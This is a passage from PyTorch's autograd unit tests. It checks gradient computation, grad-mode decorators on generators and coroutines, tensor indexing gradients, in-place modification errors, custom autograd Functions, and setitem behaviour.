(True, True, True, True, "The backward pass for this operation requires the 'mat2'"),
]
for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases:
# We should only be testing cases with sparse inputs, and at least one
# input needs to require grad so we can call a backward pass
assert a_is_sparse or b_is_sparse
assert a_req_grad or b_req_grad
a = torch.randn(size, requires_grad=a_req_grad)
if a_is_sparse:
a = a.to_sparse()
b = torch.randn(size, requires_grad=b_req_grad)
if b_is_sparse:
b = b.to_sparse()
# If no error expected, check that sparse and dense cases match
if err_msg is None:
r = a.mm(b)
r.sum().backward()
a_grad = None if a.grad is None else a.grad.clone().detach()
b_grad = None if b.grad is None else b.grad.clone().detach()
# Redo with only dense tensors
a = (a.to_dense() if a.is_sparse else a).clone().detach()
a.requires_grad = a_req_grad
b = (b.to_dense() if b.is_sparse else b).clone().detach()
b.requires_grad = b_req_grad
r = a.mm(b)
r.sum().backward()
self.assertEqual(a_grad, a.grad)
self.assertEqual(b_grad, b.grad)
else:
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mm(b)
def test_multi_backward(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q = torch.randn(5, 5, requires_grad=True)
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
q2 = q * 2
z = x + y + q2
c = a * b + q2
grad_z = torch.randn(5, 5)
grad_c = torch.randn(5, 5)
torch.autograd.backward([z, c], [grad_z, grad_c])
self.assertEqual(x.grad, grad_z)
self.assertEqual(y.grad, grad_z)
self.assertEqual(a.grad, grad_c * b)
self.assertEqual(b.grad, grad_c * a)
self.assertEqual(q.grad, (grad_c + grad_z) * 2)
def test_multi_backward_no_grad(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=False)
z = x + y
q = y * 2
# NB: we currently raise an exception if any arguments to backwards
# have requires_grad=False and don't have a grad_fn. We may want to
# relax that check to a warning.
def call_backwards():
torch.autograd.backward([z, q], [torch.ones(5, 5), torch.ones(5, 5)])
self.assertRaises(RuntimeError, call_backwards)
def test_backward_with_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
def fn():
return x ** 2 + y * x + y ** 2
gradient = torch.ones(2, 2)
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
@torch.no_grad()
def reset_grad():
x.grad.zero_()
y.grad.zero_()
torch.autograd.backward(fn(), gradient, inputs=[x, y])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, y_grad_expected)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[x])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[y])
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=y)
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
self.assertRaisesRegex(RuntimeError, 'cannot be empty',
lambda: torch.autograd.backward(fn(), gradient, inputs=[]))
def test_backward_with_nonleaf_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
x_nonleaf = x * 1
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
z = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y, x_nonleaf])
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
x_non_leaf_expected = 2 * x_nonleaf + y
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(x_nonleaf.grad, x_non_leaf_expected)
# backward doesn't have an allow_unused flag, so the behavior of backward
# when variable is not part of the graph is as if allow_used were true
# x.grad will simply be None.
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z])
self.assertIsNone(z.grad)
def test_dependent_backward(self):
x = torch.randn(10, requires_grad=True)
y = x ** 2
z = y ** 3
go_y = torch.randn(10)
go_z = torch.randn(10)
torch.autograd.backward([y, z], [go_y, go_z])
xd = x
self.assertEqual(x.grad, 2 * xd * go_y + 6 * xd.pow(5) * go_z)
def test_save_output_nr(self):
x = torch.randn(10, requires_grad=True)
class MultiOutputFn(Function):
@staticmethod
def forward(ctx, x):
return x[:5], x[5:]
@staticmethod
def backward(ctx, *grad):
return torch.cat(grad)
a, b = MultiOutputFn.apply(x)
self.assertEqual(b.output_nr, 1)
class TestFn(Function):
@staticmethod
def forward(ctx, b):
ctx.save_for_backward(b)
return b * 2
@staticmethod
def backward(ctx, grad_b):
b, = ctx.saved_tensors
self.assertEqual(b.output_nr, 1)
TestFn.apply(b).sum().backward()
def test_free_deep_graph(self):
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build a "chain" computation graph
for _ in range(depth):
y = y + y * 0.000001
# graph deletion occurs when the above locals go out of scope.
# In this case `del y` will trigger it but it's easier to leave
# it to Python to delete the locals.
# Should not stack overflow
scope()
def test_free_deep_graph_complicated(self):
def scope():
depth = 100000
randchoice = torch.randint(2, [depth, 2])
x = torch.randn(1, requires_grad=True)
y = x.clone()
# Hold the two previous values
prev_values = [None, None]
# Build a "chain with skip connections" graph
for _ in range(depth):
prev_tensors = [tensor for tensor in prev_values[:-1]
if tensor is not None]
prev_values.append(y)
prev_values.pop(0)
# Definitely pick one tensor to add
y += y * 0.000001
# Possibly add other tensors
nprev = len(prev_tensors)
if nprev == 2:
y += randchoice[depth].mul(torch.cat(prev_tensors)).sum()
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_free_deep_graph_pyfunction(self):
class MyOp(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
return grad_output, grad_output
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build deeply nested computation graph
for _ in range(depth):
y = MyOp.apply(y, y)
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_no_unnecessary_save(self):
# If we kept x in the derivative Function of x * 2 we would
# get an error in the backward that would complain that we've
# modified x, which was needed for gradient computation.
# Since we should elide unnecessary saves, this test should pass.
mu = torch.ones(1, requires_grad=True)
x = torch.empty(1)
loss = 0
for i in range(3):
x.detach_()
x.copy_(mu + i)
ft = torch.tensor([float(i)])
multiplied = x * ft
s = multiplied.sum()
loss += s
loss.backward()
def test_no_grad(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
with torch.no_grad():
w = x + y
@torch.no_grad()
def adder(x, y):
return x + y
z = adder(x, y)
self.assertFalse(w.requires_grad)
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
self.assertIsNone(w.grad_fn)
self.assertFalse(z.requires_grad)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
self.assertIsNone(z.grad_fn)
# test nested decorator and with-statement on no_grad
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
w = adder(x, y)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_generator_functions(self):
@torch.no_grad()
def gen_no_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), False)
yield i
with torch.enable_grad():
for _ in gen_no_grad():
self.assertEqual(torch.is_grad_enabled(), True)
@torch.enable_grad()
def gen_enable_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), True)
yield i
with torch.no_grad():
for _ in gen_enable_grad():
self.assertEqual(torch.is_grad_enabled(), False)
def test_set_grad_generator_functions_recursive(self):
# enable_grad_decorator_recursive and no_grad_decorator_recursive call each other
# recursively, to ensure that the decorators preserve the caller's setting
@torch.enable_grad()
def enable_grad_decorator_recursive(depth):
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_decorator_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
@torch.no_grad()
def no_grad_decorator_recursive(depth):
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_decorator_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
# enable_grad_context_manager_recursive and no_grad_context_manager_recursive call
# each other recursively, to ensure that the decorators preserve the caller's setting
def enable_grad_context_manager_recursive(depth):
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_context_manager_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
def no_grad_context_manager_recursive(depth):
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_context_manager_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertTrue(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertTrue(torch.is_grad_enabled())
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertFalse(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_coroutines(self):
@torch.no_grad()
def coro_no_grad(n=10):
self.assertFalse(torch.is_grad_enabled())
for i in range(n):
self.assertFalse(torch.is_grad_enabled())
r = yield i
self.assertFalse(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertFalse(torch.is_grad_enabled())
@torch.enable_grad()
def coro_enable_grad(n=10):
self.assertTrue(torch.is_grad_enabled())
for i in range(n):
self.assertTrue(torch.is_grad_enabled())
r = yield i
self.assertTrue(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertTrue(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
coro, r = coro_no_grad(), None
try:
while True:
self.assertTrue(torch.is_grad_enabled())
r = coro.send(r)
self.assertTrue(torch.is_grad_enabled())
except StopIteration:
pass
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
coro, r = coro_enable_grad(), None
try:
while True:
self.assertFalse(torch.is_grad_enabled())
r = coro.send(r)
self.assertFalse(torch.is_grad_enabled())
except StopIteration:
pass
def test_set_grad_coroutines_benign_exceptions(self):
class RecoverableException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertFalse(torch.is_grad_enabled())
has_raised = True
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertTrue(torch.is_grad_enabled())
has_raised = True
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
def test_set_grad_coroutines_critical_exceptions(self):
class UnrecoverableException(Exception):
pass
class SecondaryException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertFalse(torch.is_grad_enabled())
raise SecondaryException
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertTrue(torch.is_grad_enabled())
raise SecondaryException
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
def test_set_grad_coroutines_exit(self):
@torch.no_grad()
def coro_no_grad(state):
for i in range(10):
try:
self.assertFalse(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertFalse(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
@torch.enable_grad()
def coro_enable_grad(state):
for i in range(10):
try:
self.assertTrue(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertTrue(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
state = set()
with torch.enable_grad():
coro = coro_no_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
state = set()
with torch.no_grad():
coro = coro_enable_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
def test_no_grad_python_function(self):
"""Python Functions should respect grad mode."""
x = torch.ones(5, 5, requires_grad=True)
class MyOp(Function):
@staticmethod
def forward(self, x):
return x + 1
@staticmethod
def backward(self, dy):
return dy
with torch.no_grad():
y = MyOp.apply(x)
self.assertFalse(y.requires_grad)
def test_indexing(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
def compare(x, y, idx, indexed_tensor, indexed_var):
indexed_var_t = indexed_var.data
if not isinstance(indexed_tensor, torch.Tensor):
indexed_var_t = indexed_var_t[0]
self.assertEqual(indexed_tensor, indexed_var_t)
indexed_var.sum().backward()
expected_grad = torch.empty(x.size()).fill_(0)
expected_grad[idx] = 1
self.assertEqual(y.grad, expected_grad)
def check_index(x, y, idx):
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[idx]
indexed_var = y[idx]
compare(x, y, idx, indexed_tensor, indexed_var)
check_index(x, y, 1)
check_index(x, y, (1, 1))
check_index(x, y, slice(1, None))
check_index(x, y, slice(None, 2))
check_index(x, y, (slice(None, 2), 2))
check_index(x, y, (slice(1, 2), 2))
check_index(x, y, (1, slice(2, None)))
check_index(x, y, (slice(None, None), slice(2, None)))
check_index(x, y, torch.LongTensor([0, 2]))
check_index(x, y, torch.rand(4, 4).bernoulli().bool())
check_index(x, y, (Ellipsis, slice(2, None)))
check_index(x, y, ([0], [0]))
check_index(x, y, ([1, 2, 3], [0]))
check_index(x, y, ([1, 2], [2, 1]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([slice(None), [2, 3]]))
check_index(x, y, ([[2, 3], slice(None)]))
# advanced indexing, with less dim, or ellipsis
check_index(x, y, ([0]))
check_index(x, y, ([0], ))
x = torch.arange(1., 49).view(4, 3, 4)
y = Variable(x, requires_grad=True)
check_index(x, y, (slice(None), [0], [0]))
check_index(x, y, ([0], [0], slice(None)))
check_index(x, y, (slice(None), [0, 1, 2], [0]))
check_index(x, y, ([0, 1, 2], [0], slice(None)))
check_index(x, y, (slice(None), [1, 2], [2, 1]))
check_index(x, y, ([1, 2], [2, 1], slice(None)))
check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None)))
check_index(x, y, (slice(None), slice(None), [2, 1]))
check_index(x, y, (slice(None), [2, 1], slice(None)))
check_index(x, y, ([2, 1], slice(None), slice(None)))
# advanced indexing, with less dim, or ellipsis
check_index(x, y, ([0], ))
check_index(x, y, ([0], slice(None)))
check_index(x, y, ([0], Ellipsis))
check_index(x, y, ([1, 2], [0, 1]))
check_index(x, y, ([1, 2], [0, 1], Ellipsis))
check_index(x, y, (Ellipsis, [1, 2], [0, 1]))
# advanced indexing, with a tensor wrapped in a variable
z = torch.LongTensor([0, 1])
zv = Variable(z, requires_grad=False)
seq = [z, Ellipsis]
seqv = [zv, Ellipsis]
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[seq]
indexed_var = y[seqv]
compare(x, y, seq, indexed_tensor, indexed_var)
def test_indexing_duplicates(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = torch.LongTensor([1, 1, 3, 2, 1, 2])
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx:
expected_grad[i] += 1
self.assertEqual(y.grad, expected_grad)
# with advanced indexing
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 3, 2, 1, 2], [0]]
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx[0]:
for j in idx[1]:
expected_grad[i][j] += 1
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]]
y[idx].sum().backward()
expected_grad = torch.tensor([[0., 2., 0., 0.],
[1., 0., 0., 0.],
[0., 1., 0., 0.],
[0., 0., 0., 0.]])
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 65).view(4, 4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 1], slice(None), slice(None)]
y[idx].sum().backward()
expected_grad = torch.empty(4, 4, 4).zero_()
expected_grad[1].fill_(3)
self.assertEqual(y.grad, expected_grad)
def test_index_backward_does_not_save_tensor(self):
# Example from https://github.com/pytorch/pytorch/issues/24853.
# if `index(tensor, indices)` saves `tensor` for backwards, then it will
# trigger a version check on `tensor` during the backward pass, which
# will cause the following code to error because `tensor` gets modified
# by the indexing line.
a = torch.tensor([1., 0, 0])
b = torch.zeros(3, requires_grad=True)
tensor = b + 0
tensor[a != 0] = tensor[a != 0]
tensor.backward(torch.zeros_like(tensor))
def test_volatile_deprecated(self):
v = torch.autograd.torch.randn(3, 3)
with warnings.catch_warnings(record=True) as w:
self.assertFalse(v.volatile)
self.assertIn('volatile', str(w[0].message))
def test_saved_variables_deprecated(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_variables
return (grad_output, grad_output)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("always")
x = torch.randn((3, 3), requires_grad=True)
y = torch.randn((3, 3), requires_grad=True)
MyFunction.apply(x, y).sum().backward()
has_deprecated = map(lambda warn:
'deprecated' in str(warn) and
'saved_variables' in str(warn),
warns)
has_deprecated = reduce(lambda x, y: x or y, has_deprecated)
self.assertTrue(has_deprecated)
def test_requires_grad(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
z = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertFalse(a.requires_grad)
b = a + z
self.assertTrue(b.requires_grad)
def error():
raise RuntimeError
# Make sure backward isn't called on these
a._backward_hooks = OrderedDict()
x._backward_hooks = OrderedDict()
y._backward_hooks = OrderedDict()
a._backward_hooks['test'] = error
x._backward_hooks['test'] = error
y._backward_hooks['test'] = error
b.backward(torch.ones(5, 5))
def test_requires_grad_(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
self.assertIs(x, x.requires_grad_())
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_())
self.assertTrue(y.requires_grad)
self.assertIs(x, x.requires_grad_(True))
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_(True))
self.assertTrue(y.requires_grad)
z = x * y
self.assertRaises(RuntimeError, lambda: z.requires_grad_(False))
self.assertIs(z, z.requires_grad_())
self.assertTrue(z.requires_grad)
self.assertIs(z, z.requires_grad_(True))
self.assertTrue(z.requires_grad)
self.assertIs(x, x.requires_grad_(False))
self.assertFalse(x.requires_grad)
self.assertIs(y, y.requires_grad_(False))
self.assertFalse(y.requires_grad)
def test_requires_grad_inplace(self):
a = torch.randn(5, 5)
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
# non-leaf
a = torch.randn(5, 5) + 0
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
def test_no_requires_grad_inplace(self):
# basic case, should be able to modify inplace while requires_grad is False
a = torch.randn(2, 3)
a.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# same but with a view
a = torch.randn(2, 3)
b = a[:]
b.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# should fail if requires_grad = True when we modify inplace
a = torch.randn(2, 3)
b = a[:]
a.requires_grad = True
with self.assertRaises(RuntimeError):
a.add_(5)
with self.assertRaises(RuntimeError):
b.add_(5)
def test_attribute_deletion(self):
x = torch.randn((5, 5), requires_grad=True)
del x.grad
self.assertIsNone(x.grad)
with self.assertRaises(RuntimeError):
del x.data
with self.assertRaises(TypeError):
x.data = None
with self.assertRaises(RuntimeError):
del x.requires_grad
with self.assertRaises(RuntimeError):
del x._grad_fn
with self.assertRaises(RuntimeError):
del x._backward_hooks
def test_duplicate_backward_root(self):
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
x = a * b
grad_output = torch.randn_like(x)
torch.autograd.backward([x, x], [grad_output, grad_output])
self.assertEqual(a.grad, b * grad_output * 2)
self.assertEqual(b.grad, a * grad_output * 2)
def test_backward_no_grad(self):
a = torch.randn(5, 5, requires_grad=True)
b = a + 2
with self.assertRaises(RuntimeError):
torch.autograd.backward([b], [None])
def test_backward_twice_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
lambda: c.backward(torch.tensor([1, 1, 1], dtype=torch.double)))
def test_backward_twice_retained_graph_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b + 1
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_retained_graph_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_create_graph_warns(self):
try:
prev = torch.is_warn_always_enabled()
torch.set_warn_always(True)
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b * b
with warnings.catch_warnings(record=True) as ws:
c.backward(torch.ones_like(c), create_graph=True)
b.grad = None
self.assertTrue(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
# Should not warn for grad
with warnings.catch_warnings(record=True) as ws:
torch.autograd.grad(c, b, torch.ones_like(c), create_graph=True)
self.assertFalse(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
finally:
torch.set_warn_always(prev)
def test_next_functions(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertIsNotNone(a.grad_fn)
next_functions = a.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[0][1], 0)
self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[1][1], 0)
b = a + 5
next_functions = b.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIs(next_functions[0][0], a.grad_fn)
self.assertIs(next_functions[1][0], None)
def test_inplace(self):
x = torch.ones(5, 5, requires_grad=True)
y = Variable(torch.ones(5, 5) * 4, requires_grad=True)
z = x * y
q = z + y
w = z * y
z.add_(2)
# Add doesn't need it's inputs to do backward, so it shouldn't raise
q.backward(torch.ones(5, 5), retain_graph=True)
# Mul saves both inputs in forward, so it should raise
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
z = x * y
q = z * y
r = z + y
w = z.add_(y)
# w is a the last expression, so this should succeed
w.backward(torch.ones(5, 5), retain_graph=True)
# r doesn't use the modified value in backward, so it should succeed
r.backward(torch.ones(5, 5), retain_graph=True)
# q uses dirty z, so it should raise
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
with torch.no_grad():
x.grad.zero_()
m = x / 2
z = m + y / 8
q = z * y
r = z + y
prev_version = z._version
w = z.exp_()
self.assertNotEqual(z._version, prev_version)
r.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.ones(5, 5) / 2)
w.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2))
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
leaf = torch.ones(5, 5, requires_grad=True)
x = leaf.clone()
x.add_(10)
self.assertEqual(x, torch.ones(5, 5) * 11)
# x should be still usable
y = x + 2
y.backward(torch.ones(5, 5))
self.assertEqual(leaf.grad, torch.ones(5, 5))
z = x * y
x.add_(2)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
def test_mark_non_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input > 0
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return (grad_output * 0).to(torch.double)
x = torch.randn(5, 5, requires_grad=True)
mask = MyFunction.apply(x)
self.assertFalse(mask.requires_grad)
y = x.masked_fill(mask, 0)
y.sum().backward()
def test_mark_non_differentiable_mixed(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
a = input + 1
b = input + 2
ctx.mark_non_differentiable(a)
return a, b
@staticmethod
def backward(ctx, grad_a, grad_b):
self.assertTrue((grad_a == 0).all())
self.assertTrue((grad_b == 1).all())
return grad_b
x = torch.randn(5, 5, requires_grad=True)
a, b = MyFunction.apply(x)
self.assertFalse(a.requires_grad)
self.assertTrue(b.requires_grad)
b.sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5))
def test_mark_non_differentiable_none(self):
# This used to segfault because MyFunction would send back null
# gradients to MulBackward, which is implemented in C++. C++
# implemented functions expect incoming grad_ouptuts to be non-null.
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input.clone()
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return None
x = torch.randn(5, 5, requires_grad=True)
r = MyFunction.apply(x * x)
(r * x).sum().backward()
def test_return_duplicate(self):
class DoubleDuplicate(Function):
@staticmethod
def forward(ctx, x):
output = x * 2
return output, output
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def fn(x):
a, b = DoubleDuplicate.apply(x)
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(fn, [x])
gradgradcheck(fn, [x])
def test_return_duplicate_inplace(self):
class DoubleInplace(Function):
@staticmethod
def forward(ctx, x):
x.mul_(2)
ctx.mark_dirty(x)
return x, x
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def inplace_fn(x):
a, b = DoubleInplace.apply(x.clone())
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(inplace_fn, [x])
gradgradcheck(inplace_fn, [x])
# Can't modify leaf variables in-place
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x))
# Functions which modify views in-place must return only one output
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x.clone()[0]))
@suppress_warnings
def test_resize(self):
x = torch.ones(2, 3)
self.assertTrue(x.resize(3, 2).size() == (3, 2))
def _test_setitem(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
y[index] = 2
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad = torch.ones(*size)
expected_grad[index] = 0
self.assertEqual(x.grad, expected_grad)
def _test_setitem_tensor(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
value = x.new(x[index].size()).fill_(7)
value.requires_grad = True
y[index] = value
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad_input = torch.ones(*size)
expected_grad_input[index] = 0
self.assertEqual(x.grad, expected_grad_input)
self.assertEqual(value.grad, torch.ones_like(value))
# case when x broadcasts to as y[1]
x = torch.randn(4, requires_grad=True)
y = torch.zeros(2, 3, 4)
y[1] = x
y.backward(torch.randn(2, 3, 4))
self.assertEqual(x.size(), x.grad.size())
def test_setitem(self):
self._test_setitem((5, 5), 1)
self._test_setitem((5,), 1)
self._test_setitem((1,), 0)
self._test_setitem((10,), [[0, 4, 2]])
self._test_setitem((5, 5), [[0, 4], [2, 2]])
self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5), 3)
self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]])
self._test_setitem_tensor((5,), 3)
self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum())
self._test_setitem_tensor((5,), [[0, 1, 2, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]])
